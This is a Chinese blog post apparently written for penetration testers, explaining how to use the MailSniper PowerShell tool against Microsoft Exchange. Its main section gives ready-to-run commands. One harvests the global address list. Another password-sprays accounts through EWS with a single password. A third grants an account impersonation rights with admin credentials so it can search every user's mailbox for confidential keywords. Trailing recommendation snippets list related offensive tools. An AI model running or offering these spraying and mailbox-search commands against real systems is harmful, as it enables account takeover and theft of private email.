mailsniper.ps1使用

最新推荐文章于 2023-12-08 10:56:42 发布
最新推荐文章于 2023-12-08 10:56:42 发布
阅读量3k 收藏 4
点赞数
分类专栏: 内网渗透 文章标签: mailsniper exchange 邮件 爆破
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/104572715
版权

在这里插入图片描述
下载地址:mailsniper

0x01 mailsniper.ps1获取outlook所有联系人(为爆破收集邮箱)

在域环境内(域内机器即可)执行命令:

powershell -exec bypass
Import-Module .\MailSniper.ps1
Get-GlobalAddressList -ExchHostname owa2013.rootkit.org -UserName rootkit\jerry -Password Admin12345 -OutFile global-address-list.txt

在这里插入图片描述

0x02 mailsniper爆破exchange(指定密码爆破邮箱)

针对OWA接口、EWS接口和ActiveSync接口爆破。实际使用过程中可多执行几次,避免遗漏。

powershell -exec bypass
Import-Module .\MailSniper.ps1
Invoke-PasswordSprayEWS -ExchHostname owa2013.rootkit.org -UserList .\users.txt -Password Admin12345 -ExchangeVersion Exchange2013_SP1

-ExchHostname:ping -a exchange服务器ip -> 得到主机名 -> 主机名拼接域名(如:owa2013.rootkit.org)
-ExchangeVersion:若不知道可先不指定

在这里插入图片描述在这里插入图片描述

0x03 MailSniper检索邮件内容

MailSniper可以被用户或管理员用于检索查找自己邮箱和文件夹信息,而攻击者利用该工具,也可以在获得合法邮箱凭证之后,通过检索邮箱文件夹来尝试发现和窃取包含敏感信息的邮件数据。Mailsniper包含两个主要的cmdlet,分别是Invoke-SelfSearch和Invoke-GlobalMailSearch,用于检索邮件中的关键字。

查找当前用户的Exchange邮箱数据
Invoke-SelfSearch -Mailbox zhangsan@fb.com -Terms *机密* -Folder 收件箱 -ExchangeVersion Exchange2013_SP1
# 查找邮件内容中包含pwn字符串的邮件,-Folder参数可以指定要搜索的文件夹,默认是inbox,使用时最好指定要搜索的文件夹名称(或者指定all查找所有文件),因为该工具是外国人写的,Exchange英文版收件箱为Inbox,当Exchange使用中文版时收件箱不为英文名,默认查找inbox文件夹会因找不到该文件而出错

查找所有用户的Exchange邮箱数据
Invoke-GlobalMailSearch -ImpersonationAccount zhangsan -ExchHostname test2k12 -AdminUserName fb.com\administrator -ExchangeVersion Exchange2013_SP1 -Term "*内部邮件*" -Folder 收件箱
# 利用administrator管理员用户为普通用户zhangsan分配ApplicationImpersonation角色,检索所有邮箱用户的邮件中,包括“内部邮件”关键字的内容

0x04 参考

https://github.com/dafthack/mailsniper(一些详细的使用介绍)
https://www.freebuf.com/articles/web/193132.html

LQxdp
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MailSniper:MailSniper是一种渗透测试工具,用于在Microsoft Exchange环境中的电子邮件中搜索特定术语(密码,内部情报,网络体系结构信息等)。 它可以用作非管理用户来搜索自己的电子邮件,也可以用作管理员来搜索域中每个用户的邮箱
05-06
MailSniper MailSniper是一种渗透测试工具,用于在Microsoft Exchange环境中的电子邮件中搜索特定术语(密码,内部情报,网络体系结构信息等)。 它可以用作非管理用户来搜索自己的电子邮件,也可以用作Exchange管理员来搜索域中每个用户的邮箱。 MailSniper还包括其他模块,这些模块用于密码喷雾,枚举用户和域,从OWA和EWS收集全局地址列表(GAL)以及检查组织中每个Exchange用户的邮箱权限。 有关主要MailSniper功能的更多信息,请查看。 有关其他MailSniper模块的更多信息,请签出: 下载以快速参考各种MailSniper功能。 快速入门指南 MailSniper有两个主要功能。 这两个函数是Invoke-GlobalMailSearch和Invoke-SelfSearch 。 Invoke-GlobalMailSe
利用MailSniper越权访问Exchange邮箱
weixin_30823001的博客
05-05 431
0x01 概述 Microsoft Exchange用户可以授权给其他用户对其邮箱文件夹进行各种级别的访问。例如,用户可以授予其他用户读取访问其收件箱中里面的电子邮件,但是要是用户(或Exchange管理员)不小心设置了不正确的访问权限,那么这将导致所有的用户都能访问读取其的邮箱。 使用MailSniper,可以快速枚举任何用户可访问的邮箱。在这篇文章中,我将说明此问题是如何产生的,如何查找存...
PyMailSniper:MailSniper的Python端口,可通过EWS端点窃取电子邮件
05-25
致谢 该项目最初受到以下方面的启发: dafthack( ) 动机 我想变得更好地使用python编写代码,并决定做到这一点的最佳方法是编写一些有用的东西。 我想使用python实现MailSniper的功能,并通过下面提到的ecederstrand找到了该库。 这使得将MailSniper的某些功能移植到python非常容易。 ecederstrand( ) 安装 我已经设计它可以在pipenv中运行,但是您可以使用任何您喜欢的东西。 有一个requirements.txt文件,所以有 这应该足以获得Pipenv设置 pipenv install 文献资料 帮助菜单 python3 pymailsniper . py - h _____ __ __ _ _ _____ _ | __ \ | \/ | (
Exchange邮箱爆破和信息收集
谢公子的博客
08-10 7504
在渗透测试过程中,经常会碰到使用Exchange邮箱的系统。但是Exchangeweb端是无法爆破的,可以爆破客户端。 Invoke-PasswordSprayEWS MailSniper
对APT34泄露工具的分析——Jason
systemino的博客
08-05 1496
0x00 前言 Jason是由Lab Dookhtegan在2019年6月3日泄露的另一款工具,用于Exchange账户的暴力破解。 然而,泄露的这款工具虽然包括源码,但存在一些bug,无法正常使用。 本文不会分析Jason和APT34之间的关联,仅在技术研究的角度,修复Jason的bug,恢复Jason的功能,分析使用的技术,同其他开源工具做横向比较。 注: 之前关于APT34的分析文...
powercat.ps1
09-23
https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
win-acme的腾讯域名脚本DNSPod.ps1
09-08
用win-acme给windows服务器添加SSL(Let's Encrypt)证书的Powershell脚本 腾讯云,腾讯域名使用 win-acme acme.sh
Microsoft.PowerShell_profile.ps1
11-06
将脚本文件放入默认路径下 以管理员权限打开powershell 开始自动安装 powershell美化
RS_AdminDiagnosticHistory.ps1
最新发布
01-02
RS_AdminDiagnosticHistory.ps1
ESXi-Customizer-PS.ps1
11-07
ESXi-Customizer自定义工具
Exchange的渗透流程(一)
Sunnet的博客
05-07 1829
Exchange的渗透流程(一)
渗透测试各阶段工具速查(持续更新)
zouhui1003it的专栏
04-20 863
文章来源:Leticia's Blog文章作者:Leticia前言本文是渗透测试各阶段工具和快速用法速查笔记,将会持续更新。站点信息收集1 2 3 4 5 6 7 8 Googl...
学一点点渗透测试
qq_42404383的博客
08-24 790
文章目录学一点点渗透测试--信息收集1、主机发现nmap常用命令:Nmap扫描技巧:其他工具2、关联信息生成生成攻击字典3、开放漏洞情报常用网站4、开源情报收集信息(osint)搜索引擎语法在线接口相关工具DNS历史记录解析5、github hacking6、Google hacking通配符:高级语法:7、git-all-secret功能描述:开源工具:8、mailsniper.psl获取outlook所有人联系9、内网渗透信息收集0x01 Windows(工作组和域)0x02 Linux10、后渗透信息
域渗透之Exchange
weixin_65550121的博客
12-08 1045
下载地址:https://support.microsoft.com/zh-cn/topic/%E9%80%82%E7%94%A8%E4%BA%8E-windows-%E7%9A%84-microsoft-net-framework-4-8-%E8%84%B1%E6%9C%BA%E5%AE%89%E8%A3%85%E7%A8%8B%E5%BA%8F-9d23f658-3b97-68ab-d013-aa3c3e7495e0。首先我们去装win2012虚拟机的时候需要给两个网卡,一个是内网,一个是外网的网卡。
来自GitHub的系列渗透测试工具
程序员阿飘 的博客
02-04 1689
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。Kaitai Struct - 文件格式和网络协议剖析语言和Web IDE,使用C ++,C#,Java,JavaScript,Perl,PHP,Python,Ruby生成解析器。也有免费版,IDA 免费。THC Hydra - 在线密码破解工具,内置支持许多网络协议,包括HTTP,SMB,FTP,telnet,ICQ,MySQL,LDAP,IMAP,VNC等。
EmailAll 强大的邮箱收集工具(企业邮箱收集)
墨痕诉清风的博客
04-26 3631
目录 前言 下载地址 工具介绍 安装&使用 配置 proxy配置在 setting.py文件 API配置在 api.py文件 veryvp和snov去网站免费注册 GitHub的token去设置里创建一个即可 phonebook配置 模块 Search DataSets 前言 不少网民发现,打开 stack.chaitin.com 网站就能下载 EmailAll 这款工具,这款工具不仅能做数据收集,还可做数据存储。 下载地址 https://github.
一种新的攻击方式:使用Outlook 表单进行横向渗透和常驻
weixin_33901926的博客
09-13 444
本文讲的是一种新的攻击方式:使用Outlook 表单进行横向渗透和常驻, 背景 最近我们针对CrowdStrike服务进行例行调查,发现了一种攻击方法,其主要用于横向渗透和系统常驻,而且是以前我们没有看到过的。这种攻击利用Microsoft Outlook中的自定义表单(而不是宏),只需打开或预览电子邮件就会允许Visual Basic代码在系统上执行...
域用户爆破(DomainPasswordSpray)
网络安全。
03-03 2282
0x01 介绍 UserList - Optional UserList parameter. This will be generated automatically if not specified. Password - A single password that will be used to perform the password spray. P...
写个调用demo1.ps1和demo2.ps1的cmd脚本,需要demo1.ps1运行完才能运行demo2.ps1,然后销毁自己
06-03
可以使用以下的代码实现: ``` powershell.exe -File "demo1.ps1"; powershell.exe -File "demo2.ps1"; taskkill /IM cmd.exe ``` 解释一下上面的代码: - `powershell.exe -File "demo1.ps1"`:运行demo1.ps1脚本; - `powershell.exe -File "demo2.ps1"`:运行demo2.ps1脚本; - `taskkill /IM cmd.exe`:关闭当前的命令行窗口。 注意,这里使用了分号`;`将多个命令串联在一起,表示先执行前面的命令,再执行后面的命令。同时,这里使用了`/IM`参数来指定要关闭的进程名称为`cmd.exe`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值